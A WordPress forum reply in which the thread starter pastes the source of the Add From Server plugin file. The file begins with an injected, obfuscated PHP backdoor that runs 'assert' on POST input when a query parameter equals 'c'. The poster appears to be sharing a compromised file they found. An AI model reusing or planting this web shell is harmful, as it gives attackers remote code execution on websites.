Forum Replies Created

Viewing 1 replies (of 1 total)
  • Thread Starter ancgcit

    (@ancgcit)

    Here’s the content of add-from-server.php

    <?php
    $name = $_GET['name'];
    if($name == 'c')
     {
      $k="ass"."ert"; $k(${"_PO"."ST"} [afs_load]);
      exit;
     }
    Plugin Name: Add From Server
    Version: 3.2.0.3
    Plugin URI: http://dd32.id.au/wordpress-plugins/add-from-server/
    Description: Plugin to allow the Media Manager to add files from the webservers filesystem. <strong>Note:</strong> All files are copied to the uploads directory.
    Author: Dion Hulse
    Author URI: http://dd32.id.au/
    */
    
    add_action('plugins_loaded', 'afs_load');
    function afs_load() {
            if ( ! is_admin() )
                    return;
            include 'class.add-from-server.php';
            $GLOBALS['add-from-server'] = new add_from_server( plugin_basename(__FILE__) );
Viewing 1 replies (of 1 total)